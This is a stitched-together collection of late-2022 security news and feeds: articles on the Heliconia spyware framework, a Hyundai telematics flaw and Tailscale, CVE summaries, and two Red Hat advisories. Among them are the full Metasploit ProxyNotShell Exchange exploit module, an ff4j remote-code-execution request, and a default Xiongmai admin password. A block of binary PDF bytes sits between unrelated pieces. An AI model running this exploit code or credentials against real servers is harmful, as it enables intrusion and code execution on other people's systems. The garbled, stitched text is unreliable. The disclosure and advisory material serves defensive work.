A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018.

"Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device," Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up.

Variston, which has a bare-bones website, claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support the "the discovery of digital information by \[law enforcement agencies\]," among other services.

The vulnerabilities, which have been patched by Google, Microsoft, and Mozilla in 2021 and early 2022, are believed to have been utilized as zero-days to help customers install malware of their choice on the targeted systems.

Heliconia comprises a trio of components, namely Noise, Soft, and Files, each of which are responsible for deploying exploits against bugs in Chrome, Windows, and Firefox, respectively.

Noise is designed to take advantage of a security flaw in the Chrome V8 engine JavaScript engine that was patched in August 2021 as well as an unknown sandbox escape method called "chrome-sbx-gen" to enable the final payload (aka "agent") to be installed on targeted devices.

However, the attack banks on the prerequisite that the victim accesses a booby-trapped webpage to trigger the first-stage exploit.

Heliconia Noise can be additionally configured by the purchaser using a JSON file to set different parameters like the maximum number of times to serve the exploits, an expiration date for the servers, redirect URLs for non-target visitors, and rules specifying when a visitor should be considered a valid target.

Soft is a web framework that's engineered to deliver a decoy PDF document featuring an exploit for CVE-2021-42298, a remote code execution flaw impacting Microsoft Defender that was fixed by Redmond in November 2021. The infection chain, in this case, entailed the user visiting a malicious URL, which then served the weaponized PDF file.

The Files package – the third framework – contains a Firefox exploit chain for Windows and Linux that leverages a use-after-free flaw in the browser that was reported in March 2022 (CVE-2022-26485). However, it's suspected that the bug was likely abused since at least 2019.

Google TAG said it became aware of the Heliconia attack framework after receiving an anonymous submission to its Chrome bug reporting program. It further noted that there's no current evidence of exploitation, either indicating the toolset has been put to rest or evolved further.

The development arrives more than five months after the tech giant's cybersecurity division linked a previously unattributed Android mobile spyware, dubbed Hermit, to Italian software outfit, RCS Lab.

"The growth of the spyware industry puts users at risk and makes the Internet less safe, and while surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, and Windows Zero-Days

A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018.
"Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to

Vehicles made after 2012 were vulnerable to web app exploit

Charlie Osborne 01 December 2022 at 14:30 UTC  
Updated: 01 December 2022 at 15:51 UTC

Vehicles made after 2012 were vulnerable to web app exploit

  

Researchers have disclosed a critical issue in Hyundai and Genesis vehicles that could be exploited to remotely control a car.

Yuga Labs staff security engineer Sam Curry reported the findings on a Twitter thread this week (November 29), noting that the bug allowed the team to “remotely control the locks, engine, horn, headlights, and trunk of vehicles made after 2012”.

A bug bounty hunter under the moniker \_specters\_ acted as a mock car thief (with his own Hyundai vehicle) for the project by Curry and other researchers.

Read more of the latest web security vulnerability news

Curry noted that recent cybersecurity research on vehicles tends to focus on cryptographic assaults on physical keys but that, novel exploits aside, the websites and apps supporting modern communication protocols and controls may have been overlooked.

For example, the Hyundai and Genesis mobile device apps allow authenticated users to manage functions, including starting or stopping and locking or unlocking their vehicles, which could be a serious problem if compromised.

Using Burp Suite, the researchers proxied app traffic and monitored API calls, seeking an entry point.

Curry explained that there appeared to be a ‘pre-flight’ check when JSON Web Tokens (JWTs) were generated during an app’s email/password credential check.

However, as the server did not require email address confirmation, it was possible to add a CRLF character to the end of an existing victim email address during registration and create an account that bypassed the JWT and email parameter check.

The app’s HTTP response returned the victim’s vehicle identification number (VIN) during testing. Curry then sent an HTTP request with the crafted account details, and after a few seconds, Specters confirmed his car had been remotely unlocked.

**In the driver’s seat**

In itself, the attack chain required many requests. The researchers, therefore, created a Python proof-of-concept (PoC) script compiling these steps – and according to a video of the script in action, an email address is all that is required to launch an attack.

Actions that the team carried out included:

● Remotely flashing the victim’s vehicle’s headlights.

● Honking the horn.

● Starting or stopping the engine.

● Locking or unlocking the car.

● Changing a PIN.

● Unlocking the boot.

Speaking to The Daily Swig, Curry said the vulnerability was disclosed to Hyundai roughly two months ago as part of a package of telematics issues impacting different car manufacturers related to SiriusXM remote management software.

As part of a coordinated vulnerability disclosure program, a fix was issued before the vulnerability was made public.

**Fuel for thought**

While Curry said the project was “mainly for fun”, commenting on the research, Specters said:

“I do want to highlight we started this research because we all recognized that embedded security for vehicles was getting increasingly better but application security was lagging behind by a large margin. We wanted to push that change and hope we did.”

YOU MAY ALSO LIKE Million-dollar bug bounties: The rise of record-breaking payouts

Critical vulnerability allowed attackers to remotely unlock, control Hyundai, Genesis vehicles

An arbitrary file upload vulnerability in Rocket TRUfusion Enterprise before 7.9.6.1 allows unauthenticated attackers to execute arbitrary code via a crafted JSP file. Issue fixed in version 7.9.6.1.

�� ҽ� endstream endobj 3 0 obj 785 endobj 4 0 obj <> stream x��M�$� ��F\_�+�l|빆�2��� ��@��%2H\*�M����?���K�t�b�@גףÙ��,���/~�Z;4�Ȗj�|�(i#���@�o�s���O����3�o3���^o嫵�XI�p�K8Z�~�#�����m'�������\[��\]\]۵�^>E&��hK���ݥ���������8�B\[��%߮�'�3�N:p'Lرy�U���3@k,gF����'��ߋ������� �<4c~uY�lڌ�ڶ��.�{�N�.�U$e7�����I:i�c/�Pv?�CA��f,YG-~h�6l��9����\]��&|�\*����S���R�Ѫ���Hx�C�C3��#�򾍹m�O>h�'���!�� zi�s���L'��KW���f�+7\`��?%A��@#@<��\\~�Aܪ�Ea�+�\\6���$�7d�Fr�J�����˔��{N ������\]�5�#��Q�NBm��3��;���-l��җs����Ca {�Ѕ�ryZ��,�^M����6F5��D$�gqP���i�8�jM��.6�4V\\��k9����:o팠��rM� ?�^� A��\]l�m\`ʯ����@�(��\[�(��A�|-�,���h�c!h񶋍!x�� �p8��8�� \]+�0&���mdcB���+��|f.�&�+�

CVE-2022-36431

Multiple Xiongmai NVR devices, including MBD6304T V4.02.R11.00000117.10001.131900.00000 and NBD6808T-PL V4.02.R11.C7431119.12001.130000.00000, allow authenticated users to execute arbitrary commands as root, as exploited in the wild starting in approximately 2019. A remote and authenticated attacker, possibly using the default admin:tlJwpbo6 credentials, can connect to port 34567 and execute arbitrary operating system commands via a crafted JSON file during an upgrade request. Since at least 2021, Xiongmai has applied patches to prevent attackers from using this mechanism to execute telnetd.

CVE-2022-45045: Xiongmai IoT Exploitation - Blog - VulnCheck

ff4j 1.8.1 is vulnerable to Remote Code Execution (RCE).

ff4j can be use to call any constructors in the project or jvm.  
it would raise an error after constructor call and give an error in response.

    File: https://github.com/ff4j/ff4j/blob/master/ff4j-core/src/main/java/org/ff4j/property/util/PropertyFactory.java
    Function: public static Property<?> createProperty(String pName, String pType, String pValue, String desc, Set < String > fixedValues)
    Line:163 and 164
    

    git clone https://github.com/ff4j/ff4j-samples.git
    cd spring-boot-2x/ff4j-sample-springboot2x
    mvn spring-boot:run
    

    PUT /api/ff4j/propertyStore/properties/test HTTP/1.1
    Host: 127.0.0.1
    Content-Type: application/json
    accept: application/json
    Content-Length: 111
    
    { "name": "test", "description": null, "type": "org.springframework.core.io.support.ResourcePropertySource", "value": "http://example/index.html"}

CVE-2022-44262: CVE-2022-44262 · Issue #624 · ff4j/ff4j

This Metasploit module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only supports Exchange Server 2019. These vulnerabilities were patched in November 2022.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HTTP::Exchange  include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell  include Msf::Exploit::EXE  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Exchange ProxyNotShell RCE',        'Description' => %q{          This module chains two vulnerabilities on Microsoft Exchange Server          that, when combined, allow an authenticated attacker to interact with          the Exchange Powershell backend (CVE-2022-41040), where a          deserialization flaw can be leveraged to obtain code execution          (CVE-2022-41082). This exploit only support Exchange Server 2019.          These vulnerabilities were patched in November 2022.        },        'Author' => [          'Orange Tsai', # Discovery of ProxyShell SSRF          'Spencer McIntyre', # Metasploit module          'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis          'Piotr Bazydło', # Vulnerability analysis          'Rich Warren', # EEMS bypass via ProxyNotRelay          'Soroush Dalili' # EEMS bypass        ],        'References' => [          [ 'CVE', '2022-41040' ], # ssrf          [ 'CVE', '2022-41082' ], # rce          [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],          [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],          [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],          [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]        ],        'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08        'License' => MSF_LICENSE,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Platform' => ['windows'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => true,        'Targets' => [          [            'Windows Dropper',            {              'Platform' => 'windows',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper            }          ],          [            'Windows Command',            {              'Platform' => 'windows',              'Arch' => [ARCH_CMD],              'Type' => :windows_command            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'AKA' => ['ProxyNotShell'],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options([      OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),      OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])    ])    register_advanced_options([      OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])    ])  end  def check    @ssrf_email ||= Faker::Internet.email    res = send_http('GET', '/mapi/nspi/')    return CheckCode::Unknown if res.nil?    return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401    return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'    # actually run the powershell cmdlet and see if it works, this will fail if:    #   * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)    #   * the exchange emergency mitigation service M1 rule is in place    return CheckCode::Safe unless execute_powershell('Get-Mailbox')    CheckCode::Vulnerable  rescue Msf::Exploit::Failed => e    CheckCode::Safe(e.to_s)  end  def ibm037(string)    string.encode('IBM037').force_encoding('ASCII-8BIT')  end  def send_http(method, uri, opts = {})    opts[:authentication] = {      'username' => datastore['USERNAME'],      'password' => datastore['PASSWORD'],      'preferred_auth' => 'NTLM'    }    if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'      uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"      opts[:headers] = {        'X-Up-Devcap-Post-Charset' => 'IBM037',        # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362        'User-Agent' => "UP #{datastore['UserAgent']}"      }    else      uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"    end    super(method, uri, opts)  end  def exploit    # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not    # work on Exchange Server 2016    if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)      vprint_status("Detected Exchange version: #{version}")      if version < Rex::Version.new('15.2')        fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')      end    end    @ssrf_email ||= Faker::Internet.email    case target['Type']    when :windows_command      vprint_status("Generated payload: #{payload.encoded}")      execute_command(payload.encoded)    when :windows_dropper      execute_cmdstager({ linemax: 7_500 })    end  end  def execute_command(cmd, _opts = {})    xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root      <ResourceDictionary        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"        xmlns:System="clr-namespace:System;assembly=mscorlib"        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">        <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">          <ObjectDataProvider.MethodParameters>            <System:String>cmd.exe</System:String>            <System:String>/c #{cmd.encode(xml: :text)}</System:String>          </ObjectDataProvider.MethodParameters>        </ObjectDataProvider>      </ResourceDictionary>    XAML    identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root      <Obj N="V" RefId="14">        <TN RefId="1">        <T>System.ServiceProcess.ServiceController</T>          <T>System.Object</T>        </TN>        <ToString>Object</ToString>        <Props>          <S N="Name">Type</S>          <Obj N="TargetTypeForDeserialization">            <TN RefId="1">              <T>System.Exception</T>              <T>System.Object</T>            </TN>            <MS>              <BA N="SerializationData">                #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}              </BA>            </MS>          </Obj>        </Props>        <S>          <![CDATA[#{xaml}]]>        </S>      </Obj>    IDENTITY    execute_powershell('Get-Mailbox', args: [      { name: '-Identity', value: identity }    ])  endendclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream  include Msf::Util::DotNetDeserialization  def self.generate    from_values([      Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),      Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(        class_info: Types::General::ClassInfo.new(          obj_id: 1,          name: 'System.UnitySerializationHolder',          member_names: %w[Data UnityType AssemblyName]        ),        member_type_info: Types::General::MemberTypeInfo.new(          binary_type_enums: %i[String Primitive String],          additional_infos: [ 8 ]        ),        member_values: [          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(            obj_id: 2,            string: 'System.Windows.Markup.XamlReader'          )),          4,          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(            obj_id: 3,            string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'          ))        ]      ),      Types::RecordValues::MessageEnd.new    ])  endend

Microsoft Exchange ProxyNotShell Remote Code Execution

Red Hat Security Advisory 2022-8679-01 - The USBGuard software framework provides system protection against intrusive USB devices by implementing basic whitelisting and blacklisting capabilities based on device attributes. To enforce a user-defined policy, USBGuard uses the Linux kernel USB device authorization feature.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: usbguard security update  
Advisory ID:       RHSA-2022:8679-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8679  
Issue date:        2022-11-29  
CVE Names:         CVE-2019-25058  
====================================================================  
1. Summary:

An update for usbguard is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The USBGuard software framework provides system protection against  
intrusive USB devices by implementing basic whitelisting and blacklisting  
capabilities based on device attributes. To enforce a user-defined policy,  
USBGuard uses the Linux kernel USB device authorization feature.

Security Fix(es):

* usbguard: Fix unauthorized access via D-Bus (CVE-2019-25058)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2058465 - CVE-2019-25058 usbguard: Fix unauthorized access via D-Bus

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
usbguard-1.0.0-2.el8_4.1.src.rpm

aarch64:  
usbguard-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-dbus-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-notifier-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-tools-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.aarch64.rpm

noarch:  
usbguard-selinux-1.0.0-2.el8_4.1.noarch.rpm

ppc64le:  
usbguard-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-dbus-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-notifier-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-tools-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.ppc64le.rpm

s390x:  
usbguard-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-dbus-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-notifier-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-tools-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.s390x.rpm

x86_64:  
usbguard-1.0.0-2.el8_4.1.i686.rpm  
usbguard-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-dbus-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.i686.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.i686.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.i686.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-notifier-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.i686.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-tools-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.i686.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2019-25058  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4ZVrtzjgjWX9erEAQhcGw//aM+9IHiIvv1znK1QwbtX0uLCxEme6IVn  
LijSTCBDetqkKxvGW65apZWkQveZx975T9kgG7rY0SX2e5JsTITL1Z7w5DAKp0rV  
jqtb01AV1GMpx4WcZJ7Jrl1YseAF+o1tUtMUTgjXxtieivx4v6BWpeSJ95w2H9AI  
Dlm8LdOuFjLO7RtaMVg0Xhr/b+Ae+sTk/DaEn9k5S7Qh2hGNCfg0o0sOHny6+lYQ  
ZtTcyafLsZ4nR5myt3+BzjxyQEUXP5NuSYGW212R/X5QPbfCgneJHROh11ixczwP  
1nJU3bc1VgW3PbrFtxEpZ3qLyTrjqGeB2V4JthodY3Y5cX85jsMY3QlAwni1ijmI  
PL3hcTXoKUJkTo84mOravY4KVXCwMEIdwXiyENRb77kZbiYl1J07uD4Q5lU3GFTu  
c10dwWL53Aoa7WpkqD6PuqNvfpRK1Qx+a0nn/ebpu5fJXNekcKKPdh8aUnPxqhL0  
i3O1ligEZ88B55Tk2byCHdp7KilCCRGzJw4s7eYfFeLXYM8hEV5kIDw9gprJUA2A  
rND7SqjnxPfMUuO7hdb5F9krFlvh3L3dx9xO+wnLvlWz1IalIw2HnT3XuPwqsfbI  
jFMSpxtceVtRBWU2Q3hOuPUBzxXg/BR68uzWJbp5UOntkbjepbXkpfOwqbhwp2AQ  
nRydwjwSMHE=1Kbx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8679-01

Red Hat Security Advisory 2022-8673-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:8673-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8673  
Issue date:        2022-11-29  
CVE Names:         CVE-2022-1158  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.8.4) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Multicast packets are not received by all VFs on the same port even  
though they have the same VLAN (BZ#2117027)

* Backport use of a dedicate thread for timer wakeups (BZ#2127206)

* Update RT source tree to the RHEL-8.4.z13 source tree. (BZ#2129948)

* Cannot trigger kernel dump using NMI on SNO node running PAO and RT  
kernel  [RT-8] (BZ#2139853)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.71.1.rt7.143.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.71.1.rt7.143.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4ZVsdzjgjWX9erEAQizwA/9HsqWNFvtZGAaKnR2FjFT2Ry99Vglsmor  
e14rydyVgcG7g9nHFDj5S63+e0pELNJWWhrqIi/GiNaI4HyNlyRvFnmJFUP/xbVy  
g0kv3hAZy2T36ZDgjb+1fdwlBNDlJ/xHRwxb7gkQJL3M9soeJlvcz6V9rkWt+9Y0  
guB1eQQesUI2ratllLkkw9xbfOS+zEyDS468aPMVjbEHOnRM4/NGNkNgy3VBH4Dh  
aCx0XVmubD/q5Umuy55mW6W89ZyukK+2iPpJnnmsV4IEmM4uMKvn+Okz4bMRSprE  
6BpISUdA0XsLspUSdR4RJscq/8w1QQZAFHvOEQMuWTv3xLyqMeY18IN1vW3KvgUR  
gAfLrm4arpQZKICfSd7Ekvxy83o552a9OiFmP8F9KimURqp+CG7k8jq/Czk2o22g  
jHg34VqRtDMhQ54ZsOuhBarmy4cRoPBHaYaK9gahoaw/Mf9KHBxs8/qpZl+facv4  
Y3rjy1DZ+FhS3JjmVhQeEmDe93QUwEEenthmbHsjbcCZjgzf3Sur0oYTW+b3YBke  
f1wzh0CutwG/DE38MsxLuSyEgrfGAaDj0Q+uZ2SeJfEW4/gAqTStG2S0bUDkI8wI  
GNY3lmymokj4kgqpm/gwQy3ZplcGbB+E2LwiBJhnB2qfKWxF5DVoRyFeVU2gq1+M  
UgjKLL/zWok=rA+M  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8673-01

Users should manually update to the latest version now

Users should manually update to the latest version now

  

UPDATED A series of flaws in Tailscale, an open source mesh virtual private network (VPN) software, could allow attackers to stage remote code execution (RCE) attacks against VPN nodes.

Tailscale depends on multiple services. The main process, called tailscaled, does the work of connecting nodes and sending/receiving packets.

There is a separate process that provides a user interface and a tray icon to configure and monitor the services. This front-end interface communicates with the tailscaled service through an HTTP API called .

**From DNS rebinding to control plane takeover**

If a malicious website tries to send a JavaScript command to the Tailscale LocalAPI, the browser’s Same-Origin policy will prevent it.

However, according to the findings of security researcher Emily Trau and Jamie McClymont, if the attacker manages to perform a DNS rebinding attack on the Tailscale node, they will be able to map their malicious domain to the local IP and send arbitrary commands to the .

